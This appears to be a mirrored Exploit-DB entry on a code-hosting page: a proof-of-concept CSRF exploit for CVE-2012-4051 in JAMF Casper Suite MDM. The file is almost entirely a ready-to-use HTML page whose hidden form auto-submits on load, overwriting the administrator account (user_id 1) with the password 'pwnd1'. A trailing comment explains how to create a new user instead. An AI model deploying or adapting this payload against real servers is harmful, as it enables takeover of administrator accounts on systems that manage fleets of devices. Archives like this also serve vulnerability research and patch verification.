bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/jsp/webapps/21545.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

40 lines
No EOL
1.3 KiB
Text
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

CVE-2012-4051 - JAMF Casper Suite MDM CSRF Vulnerability
# Exploit Title: JAMF Software's Casper Suite MDM Solution CSRF
# Date: Discovered and reported July 2012
# Author: Jacob Holcomb/Gimppy042
# Software JAMF Software Casper Suite (http://jamfsoftware.com/products/casper-suite)
# CVE : CVE-2012-4051 for the CSRF 
<head>
<title>PwNd JAMF Casper Admin CSRF BY:Jacob Holcomb</title>
</head>
<body>
<form name="csrf"
action="https://CASPERSUITE_SERVER:8443/editAccount.html" method="post">
<input type="hidden" name="view" value="Save"/>
<input type="hidden" name="source" value="jss"/>
<input type="hidden" name="lastPage" value="editAccountGeneral.jsp"/>
<input type="hidden" name="lastTab" value="Account"/>
<input type="hidden" name="username" value="Gimppy"/>
<input type="hidden" name="realname" value="Pwnd"/>
<input type="hidden" name="email" value="Admin"/>
<input type="hidden" name="phone" value="Password"/>
<input type="hidden" name="password" value="pwnd1"/>
<input type="hidden" name="vpassword" value="pwnd1"/>
<input type="hidden" name="user_id" value="1"/>
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>
If the HTML parameter/variable "user_id" is changed to a value of negative
one (-1) this request to the web server will create a new user.
Reference in a new issue View git blame Copy permalink